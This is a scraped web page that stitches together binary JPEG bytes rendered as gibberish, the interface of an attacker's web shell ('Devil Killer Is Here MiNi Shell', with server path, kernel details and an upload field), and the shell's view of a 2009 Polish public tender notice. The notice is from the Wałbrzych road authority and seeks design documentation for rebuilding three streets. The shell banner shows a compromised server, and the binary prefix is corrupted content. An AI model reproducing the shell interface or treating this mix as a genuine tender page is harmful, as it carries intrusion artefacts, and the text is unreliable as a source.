JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090306/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090306/53210-N-2009.html

<p class="kh_header"><b>Wałbrzych: Opracowanie dokumentacji projektowej przebudowy dróg gminnych: nr 116554 - ul. Sienkiewicza, nr 116560D - ul. Kościuszki i nr 116550 - ul. Moniuszki</b><br>
<b>Numer ogłoszenia: 53210 - 2009; data zamieszczenia: 06.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg i Komunikacji , ul. Armii Krajowej 35, 58-302 Wałbrzych, woj. dolnośląskie, tel. 074 6414400, 6414408, faks (074) 6414404.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdik.walbrzych.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa Gminy Wałbrzych.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej przebudowy dróg gminnych: nr 116554 - ul. Sienkiewicza, nr 116560D - ul. Kościuszki i nr 116550 - ul. Moniuszki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.	Opis przedmiotu  zamówienia

3.1. Przedmiotem zamówienia jest opracowanie dokumentacji projektowej przebudowy    dróg gminnych: nr 116554 - ul. Sienkiewicza (długość ok. 134 mb), nr 116560D - ul. Kościuszki (długość ok. 114 mb) i  nr 116550 - ul. Moniuszki (długość ok. 283 mb) , która ma zawierać:

-	projekt budowlany (w tym projekt zagospodarowania terenu) 
-	projekt wykonawczy - część drogowa 
-	projekt wykonawczy odwodnienia 
-	projekt wykonawczy oświetlenia ulicznego 
-	projekt wykonawczy sieci wodociągowej wraz z przyłączami
-	badania geotechniczne podłoża gruntowego zgodnie z załącznikiem nr 4 do Rozporządzenia Ministra Transportu i Gospodarki Morskiej z dnia 2  marca 1999 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz. U. Nr 43 poz. 430)
-	projekt docelowej organizacji ruchu 
-	projekt przebudowy bądź zabezpieczenia kolidujących uzbrojeń 
-	przedmiary robót 
-	kosztorysy inwestorskie
-	szczegółowe specyfikacje techniczne 
Zakres ilościowy zamówienia:

1). Projekt budowlany - (w tym projekt zagospodarowania terenu - 8 egz. i projekty
architektoniczno - budowlane - 8 egz.),
2). Projekty wykonawcze - po 4 egz. - dla każdej branży,
3). Przedmiary robót  - po 1 egz. - dla każdej branży,
4). Formularz przedmiaru robót do wyceny - po 1 egz. - dla każdej branży,
5). Specyfikacje techniczne - po 1 egz. - dla każdej branży,
 6). Kosztorys inwestorski - po 1 egz. - dla każdej branży.
Całość dokumentacji projektowej należy załączyć również na nośniku elektronicznym (CD) w formacie: doc., xls., pdf., dwg. Pliki muszą być zoptymalizowane pod względem rozmiaru. Jakość zeskanowanych lub wygenerowanych dokumentów,  rysunków technicznych, zdjęć powinna umożliwić odczytanie wszystkich detali i cech oraz powinna nie przekraczać rzeczywistej rozdzielczości biurowych urządzeń do wyświetlania i powielania danych. Forma pisemna musi być tożsama z formą cyfrową dokumentacji projektowej.
 
Projekty należy wykonać w oparciu o obowiązujące przepisy i normy, ze szczególnym uwzględnieniem:
1.	ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (tekst jednolity Dz. U. Nr 193 poz. 1194 z 2008 r. ),
2.	ustawy z dn. 21 sierpnia 1997 r. o gospodarce nieruchomościami (tekst jednolity Dz. U. Nr 261, poz. 2603 z 2004 r. z późniejszymi zmianami),
3.	ustawy z dnia 21 marca 1985 o drogach publicznych (tekst jednolity Dz. U. Nr 19 poz. 115 z 2007 r. z późniejszymi zmianami),
4.	rozporządzeniem Ministra Transportu i Gospodarki Morskiej z dn. 2 marca 1999 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz. U. Nr 43 z 1999 r. poz. 430),
5.	rozporządzeniem Ministra Transportu i Gospodarki Morskiej z dn. 30 maja 2000 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogowe obiekty inżynierskie i ich usytuowanie (Dz. U. Nr 63, poz. 735 z 2000 r.),
6.	ustawy z dnia 18 lipca 2001 r. Prawo wodne (tekst jednolity Dz. U. Nr 239 poz. 2019  z 2005 r.),
7.	ustawy z 16 kwietnia 2004 r. o ochronie przyrody (Dz.U. Nr 92 poz. 880 z późn. zm.).
8.	ustawy z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska  (tekst jednolity Dz. U. Nr 25 poz. 150 z późniejszymi zmianami),
9.	ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199 poz. 1227),
10.	rozporządzeniem Rady Ministrów z dnia 9 listopada 2004 r. w sprawie określenia rodzajów przedsięwzięć mogących znacząco oddziaływać na środowisko oraz szczegółowych uwarunkowań związanych z kwalifikowaniem przedsięwzięcia do sporządzenia raportu o oddziaływaniu na środowisko  (Dz. U. Nr 92 z 2005 r. poz. 769 wraz z późniejszymi zmianami.),
11.	Ustawy z dnia 27 kwietnia 2001 r. - o odpadach (Dz. U. Nr 62 poz. 628 z 2001 r. z późn. zm.),
12.	ustawy z dn. 7 lipca 1994 r. Prawo budowlane (Dz. U. Nr 156 z 2006 r. poz. 1118 z późniejszymi zmianami),
13.	Rozporządzeniem Ministra Infrastruktury z dn. 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych, wykonywania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. Nr 202 z 2004 r., poz. 2072 z późniejszymi zmianami),
14.	Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. Nr 130 z 2004 r. poz. 1389 z późniejszymi zmianami),
15.	Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. Nr 120 z 2003 r., poz. 1133 z późniejszymi zmianami),
16.	ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym  (Dz. U. Nr 80 poz. 717 z 2003 r. z późniejszymi zmianami),
17.	obowiązujących norm i dyrektyw Unii Europejskiej.

3.2. Nazwa i kod przedmiotu zamówienia określone we Wspólnym Słowniku Zamówień CPV:
71.32.00.00-7 Usługi inżynieryjne w zakresie projektowania.


3.3 Opis szczegółowy i charakterystyka zadania:
 
Stan istniejący:

- ul. Sienkiewicza 
1. Klasa funkcjonalno-techniczna - klasa L (lokalna);
2. Kategoria ulicy - gminna;
3. Przekrój poprzeczny: 1x1, jezdnia + obustronne chodniki;
4. Typy skrzyżowań: zwykłe;
5. Strefa ograniczonej prędkości; 20 km/h;
6. Odwodnienie - poprzez wpusty uliczne do kanału deszczowego;
7. Oświetlenie -  przewieszka; 
8. Szerokość w liniach rozgraniczających - 7 - 12 m.

- ul. Kościuszki
1. Klasa funkcjonalno-techniczna - klasa L (lokalna);
2. Kategoria ulicy - gminna;
3. Przekrój poprzeczny: 1x1, jezdnia + obustronne chodniki;
4. Typy skrzyżowań: zwykłe;
5. Strefa ograniczonej prędkości; 20 km/h;
6. Odwodnienie - poprzez wpusty uliczne do kanału deszczowego;
7. Oświetlenie -  przewieszka;
8. Szerokość w liniach rozgraniczających -  9 - 15 m.

- ul. Moniuszki
1. Klasa funkcjonalno-techniczna - klasa D (dojazdowa);
2. Kategoria ulicy - gminna;
3. Przekrój poprzeczny: 1x1, jezdnia + obustronne chodniki;
4. Typy skrzyżowań: zwykłe;
5. Odwodnienie - poprzez wpusty uliczne do kanalizacji ogólnospławnej;
6. Oświetlenie uliczne (nowe) - na słupach typu retro
7. Szerokość w liniach rozgraniczających - 7,5 - 11 m.

Opis wymagań zamawiającego w stosunku do przedmiotu zamówienia:

Konstrukcja nawierzchni
Konstrukcję nawierzchni zaprojektować z kostki kamiennej na podbudowie (z wykorzystaniem kostki obecnie znajdującej się w nawierzchni), dla kategorii ruchu KR2. 
W konstrukcji nawierzchni chodników wykorzystać  wbudowane w nim obecnie płyty granitowe oraz kostki bazaltowe.
Nawierzchnia jezdni i chodników swoim wyglądem powinna nawiązywać do wyglądu i charakteru tego rejonu miasta.
Urządzenia techniczne własne 
- Odwodnienie 
Kanały deszczowe znajdujące się  w ulicach Kościuszki i Sienkiewicza wymagają renowacji. Należy zaprojektować nowe przykanaliki oraz studzienki betonowe wyposażone w osadniki, wpusty powinny posiadać zabezpieczenie przed kradzieżą.
W ulicy Moniuszki należy zaprojektować kanał deszczowy z PCV wraz z przykanalikami i betonowymi studzienkami wyposażonymi w osadniki, wpusty powinny posiadać zabezpieczenie przed kradzieżą.
Wszystkie pokrywy włazowe powinny być wykonane z żeliwa z wypełnieniem betonowym.
Zamawiający może udostępnić (w wersji papierowej i na nośniku cyfrowym) wyniki z przeprowadzonej w roku 2008 inspekcji kanału deszczowego, wykonanego kamerą TV w ulicach Kościuszki i Sienkiewicza. Inspekcję wykonało Przedsiębiorstwo Usługowo Handlowe KOZAK, ul. Łęgi 2, 01-329 Warszawa. 
- Oświetlenie
Należy zaprojektować oświetlenie uliczne ulic Sienkiewicza i Kościuszki. Słupy, wysięgniki oraz oprawy swym wyglądem mają nawiązywać do oświetlenia znajdującego się  w Rynku i ulicy Moniuszki. Zamawiający posiada słupy i wysięgniki retro, które mają znajdować się na ul. Sienkiewicza. 
 
W miarę możliwości projektowane oświetlenie powinno posiadać wydzielone zasilanie. 
Infrastruktura nie związana z drogą
Należy zaprojektować przebudowę sieci wodociągowej wraz z urządzeniami na sieci oraz wykonanie nowych przyłączy do budynków w ulicach Kościuszki, Moniuszki i Sienkiewicza.
Dokumentacja projektowa winna również przewidywać usunięcie kolizji z pozostałymi urządzeniami infrastruktury, a także z elementami zagospodarowania terenu. W projektach usunięcia kolizji z urządzeniami infrastruktury technicznej winny być zachowane dotychczasowe właściwości użytkowe i parametry techniczne przebudowywanych urządzeń. Projektant przygotowuje materiały do uzyskania warunków przebudowy, bądź zabezpieczenia kolidującej infrastruktury technicznej.
W ramach zamówienia Wykonawca zobowiązany będzie do:
1. uzyskania podkładu geodezyjnego do celów projektowych;
2. uzyskania niezbędnych warunków technicznych do projektowania od jednostek administrujących 
    siecią dróg związanych z projektem (skrzyżowanie z ul. Moniuszki, ul. Mickiewicza i Pl. Tuwima
    - Starostwo Powiatowe w Wałbrzychu);
3. uzyskania warunków technicznych od gestorów sieci nie związanych z funkcją drogi, a 
    znajdujących się w granicach opracowania projektowego (o ile takie wystąpią);
4. wykonania wielobranżowego projektu budowlanego z niezbędnymi uzgodnieniami oraz projektów 
    wykonawczych w zakresie:
a) robót drogowych, oświetlenia drogowego i kanalizacji deszczowej, sieci wodociągowej,
b) stałej (docelowej) organizacji ruchu,
c) opracowania geotechnicznych warunków posadowienia,
d) ewentualnej przebudowy urządzeń nadziemnych i podziemnych (tj.  kanalizacji sanitarnej, sieci energetycznej, gazowej, teletechnicznej lub innych) wynikających z kolizji i warunków gestorów urządzeń, zaakceptowanych przez Zamawiającego;
5. przygotowania i uzyskania materiałów niezbędnych do złożenia wniosku o wydanie decyzji o 
    zezwoleniu na realizację inwestycji drogowej zgodnie z Ustawą z dnia 10 kwietnia 2003 r o 
    szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (tekst 
    jednolity Dz. U. Nr 193 poz. 1194 z 2008 r. ),. Obowiązkiem Wykonawcy będzie m. in.
    przygotowanie map zawierających projekty podziału nieruchomości oraz przeprowadzenie 
    niezbędnych podziałów, uzyskanie decyzji o środowiskowych uwarunkowaniach, sporządzenie 
    raportu o oddziaływaniu inwestycji na środowisko (w razie takiej potrzeby) oraz sporządzenie 
    operatu i uzyskanie pozwolenia wodnoprawnego (w razie takiej potrzeby). Dla potrzeb dokonania 
    wyceny prac projektowych Zamawiający ustala ilość podziałów niezbędnych dla
    zrealizowania inwestycji  na  5.
6. uzyskania decyzji pozwolenia na prowadzenie prac na obszarze  wpisanym do rejestru zabytków,
7. uzyskania decyzji o zezwoleniu na realizację inwestycji drogowej;
8. sporządzenia informacji dotyczącej bezpieczeństwa i ochrony zdrowia ze względu na specyfikę
    projektowanego obiektu budowlanego, uwzględnianej w planie bezpieczeństwa i ochrony zdrowia,
    zgodnie z Prawem Budowlanym, ust. 20, pkt. 1, ust. 1b;
9. wykonania wypisów z rejestru gruntów i sporządzenia wykazu działek zajmowanych pod
    inwestycję wraz z naniesioną na mapy obrębowe linią rozgraniczenia ulicy,
10. wykonania wypisów z rejestru gruntów i sporządzenia wykazu działek zajmowanych pod zaplecze 
    budowy(przewidzieć w miarę możliwości lokalizację na działkach będących własnością Gminy
    Wałbrzych),
11. wykonania planszy zbiorczej uzbrojenia istniejącego i projektowanego - w kolorze,
12. sporządzenia specyfikacji technicznych wykonania i odbioru robót budowlanych,
13. wykonania przedmiarów robót oraz kosztorysu inwestorskiego.

Kontrola i odbiór prac projektowych.

Kontrola i odbiór usługi.
Narady koordynacyjne.
Wykonawca weźmie udział i będzie prezentował wykonanie opracowań projektowych na naradach koordynacyjnych przynajmniej 1 raz w miesiącu w siedzibie Zamawiającego w terminie uzgodnionym z nim.
Kontrola wykonania prac projektowych przez Zamawiającego.
Zamawiający będzie wykonywał bieżącą kontrolę wykonywania usługi w trakcie narad koordynacyjnych sprawdzając jej zgodność z umową, osobiście lub poprzez Przedstawiciela Zamawiającego. 
Przy opracowaniu poszczególnych części projektu należy uwzględnić następujące zalecenia:
1. projekt wykonawczy powinien posiadać wszelkie niezbędne, szczegółowe rozwiązania wynikające
    z przedmiotu zamówienia i niezbędne do realizacji zadania,
2. projekt powinien posiadać wykaz opracowań oraz pisemnie oświadczenie Wykonawcy, że
    wykonany jest zgodnie z umową, obowiązującymi normami i został wykonany w stanie 
    kompletnym z punktu widzenia celu, któremu ma służyć.
3. formularz przedmiaru robót do wyceny należy sporządzić w układzie tabelarycznym wg przedmiaru
    podstawowego wg KNR z podaniem SST przy każdej pozycji . W tabeli należy ująć: 1. Lp, 2. 
    Pozycja SST, 3. Rodzaj robót, 4. Jednostka, 5. Ilość jednostek, 6. Cena jednostkowa, 7. Wartość 
    netto
4. Szczegółowe specyfikacje techniczne dla robót drogowych powinny być sporządzone na podstawie 
    aktualnie obowiązujących Ogólnych Specyfikacji Technicznych wydanych przez Generalną 
    Dyrekcję Dróg Publicznych .
5. jednostka projektująca przekaże Zamawiającemu dokumentację w siedzibie Zamawiającego.
6. Części opisowe wykonane będą za pomocą komputerowego edytora tekstów kompatybilnego z MS 
    Word, przedmiar robót i kosztorys ofertowy dostarczyć także w wersji elektronicznej w formacie 
    danych kompatybilnych z MS Excel.

Wytyczne techniczne do opracowania dokumentacji projektowej:
1. przed przystąpieniem do opracowania projektu należy przeprowadzić badania geotechniczne
    podłoża gruntowego.
2. Zamawiający upoważnia Wykonawcę do występowania w jego imieniu w sprawach dot. uzyskania
    warunków technicznych od gestorów sieci i urządzeń i uzyskania pozwolenia na budowę.
3. przekrój konstrukcyjny uzgodnić z Zamawiającym.
4. konsultować z Zamawiającym zakres robót.
5. w początkowej fazie opracowania dokumentacji ustalić z Zamawiającym szczegółowe warunki do
    projektowania - podstawowe dane techniczne , warunki do projektowania z zakresu oznakowania i 
    urządzeń bezpieczeństwa ruchu.
6. wykorzystywać w opracowywanej dokumentacji najnowsze rozwiązania technologiczne.
7. projekt budowlany winien uzyskać wymagane przepisami szczegółowymi opinie i uzgodnienia
8. uzyskać akceptację Zamawiającego dla warunków wydanych przez gestorów sieci.
9. wszelką korespondencję związaną z prowadzonymi pracami projektowymi prowadzić z 
    powiadomieniem Zamawiającego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 8.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 6.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1. spełniają warunki określone w art. 22 ust. 1 Ustawy oraz nie podlegają wykluczeniu z 
    postępowania o udzielenie zamówienia, zgodnie z art. 24 Ustawy,
2. dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia, tj.
    projektantami oraz sprawdzającymi rozwiązania projektowe posiadającymi:
	1) uprawnienia do projektowania w specjalnościach wynikających z zakresu 
	    przedmiotu zamówienia, w tym:
		- drogowej,
		- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, gazowych, 
		  wodociągowych i kanalizacyjnych,
		- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i 
		  elektroenergetycznych,
		- telekomunikacyjnej,	
                  wymagane przepisami ustawy Prawo Budowlane (Dz.U. z 2006 r. Nr 156, poz. 
	     1118 z późn. zm.) oraz  zgodnie z Rozporządzeniem Ministra Transportu i 
                  Budownictwa z dn. 28  kwietnia 2006 r. w sprawie samodzielnych funkcji 
                  technicznych w budownictwie (Dz.U. Nr  83 poz. 83 poz. 578 z późn., zm.)
2) trzyletnie doświadczenie w projektowaniu w danej specjalności (dotyczy 
    projektantów i sprawdzajacych),  
		3.  wykonali w okresie ostatnich trzech lat przed dniem wszczęcia postępowania 
                 o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym 
                 okresie, co najmniej 1 usługę w zakresie opracowania dokumentacji projektowej na   
		    przebudowę  lub budowę ulicy wraz ze skrzyżowaniami o długości min. 0,5 km (z 
		    przebudową lub budową uzbrojenia pod i nadziemnego).

6.2. Ocena, czy Wykonawca spełnia przedstawione wyżej warunki udziału w postępowaniu, zostanie   
       dokonana zgodnie z kryterium spełnia/nie spełnia na podstawie analizy załączonych do oferty 
       dokumentów (określonych w pkt. 7 SIWZ) potwierdzających spełnienie ww. warunków udziału w 
       postępowaniu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 7.	Dokumenty i oświadczenia, jakie powinien dostarczyć Wykonawca 

7.1.	Celem potwierdzenia spełnienia warunków udziału w postępowaniu, określonych w pkt. 6 SIWZ Wykonawca składa następujące oświadczenia i dokumenty:

7.1.1.	Na potwierdzenie warunku nr 1 (określonego w pkt. 6.1. SIWZ):

a)Aktualny odpis/y  z właściwego rejestru albo aktualne  zaświadczenie/a o wpisie do ewidencji 
      działalności gospodarczej wystawiony, jeżeli odrębne przepisy wymagają wpisu do rejestru 
      lub zgloszenia do ewidencji działalnosci gospodarczej, wystawione  nie wcześniej niż  
      6 miesięcy przed upływem terminu składania ofert, 
b)oświadczenie, że Wykonawca spełnia wymogi zgodnie z art. 22 ust. 1 ustawy,
c)oświadczenie, że Wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 
      24 ustawy ,
d)oświadczenie Wykonawcy o nie zaleganiu z opłacaniem podatków we właściwym Urzędzie 
      Skarbowym (za okres ostatnich  3 miesięcy przed upływem terminu składania ofert), lub że 
      Wykonawca uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych 
      płatności, lub że wstrzymano w całości  wykonanie decyzji organu podatkowego ,
e)oświadczenie Wykonawcy o  nie zaleganiu  we właściwym oddziale Zakładu 
      Ubezpieczeń Społecznych lub Kasie Rolniczego Ubezpieczenia Społecznego  z 
      opłacaniem opłat i składek na ubezpieczenie zdrowotne lub społeczne (za okres 
      ostatnich  3 miesięcy  przed upływem terminu składania ofert)  lub że Wykonawca 
      uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności , lub 
      wstrzymano w całości wykonanie decyzji właściwego organu  ,

7.1.2. Na potwierdzenie warunku nr 2 (określonego w pkt. 6.1. SIWZ):

1. uprawnienia budowlane do projektowania, wymagane przepisami ustawy Prawo Budowlane w 
    specjalnościach:
- drogowej,
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, gazowych wodociągowych 
  i kanalizacyjnych,
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i
  elektroenergetycznych,
- telekomunikacyjnej,
2. aktualne zaświadczenia o przynależności do właściwej Okręgowej Izby Inżynierów Budownictwa 
    zgodnie z obowiązującymi przepisami - osób, które będą uczestniczyć w wykonaniu zamówienia;
3. wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć 
    w wykonaniu zamówienia (wraz z informacjami na temat ich kwalifikacji zawodowych - 
    posiadanych uprawnień, doświadczenia, a także wskazujący zakres wykonywanych przez nich 
    czynności) ,
4. pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania 
    zamówienia - załącza tylko wtedy, jeżeli w wykazie, o którym mowa w pkt. 7.1.2.3. SIWZ, wskazał 
    osoby, którymi będzie dysponował .

7.1.3. Na potwierdzenie warunku nr 3 (określonego w pkt. 6.1. SIWZ):

1. wykaz wykonanych ważniejszych usług a w przypadku świadczeń okresowych lub ciągłych 
   również wykonywanych w okresie ostatnich trzech lat przed dniem wszczęcia  postępowania o 
   udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, 
   odpowiadających swoim rodzajem usługom stanowiącym  przedmiot zamówienia, z  podaniem 
   przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentów potwierdzających, że usługi 
   te zostały wykonane należycie ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.zdik.walbrzych.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg i Komunikacji w Wałbrzychu
ul. Armii Krajowej 35
58-302 Wałbrzych, pokój nr 103a  Cena: 7,50 zł.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.03.2009 godzina 10:00, miejsce: Zarząd Dróg i Komunikacji w Wałbrzychu
ul. Armii Krajowej 35
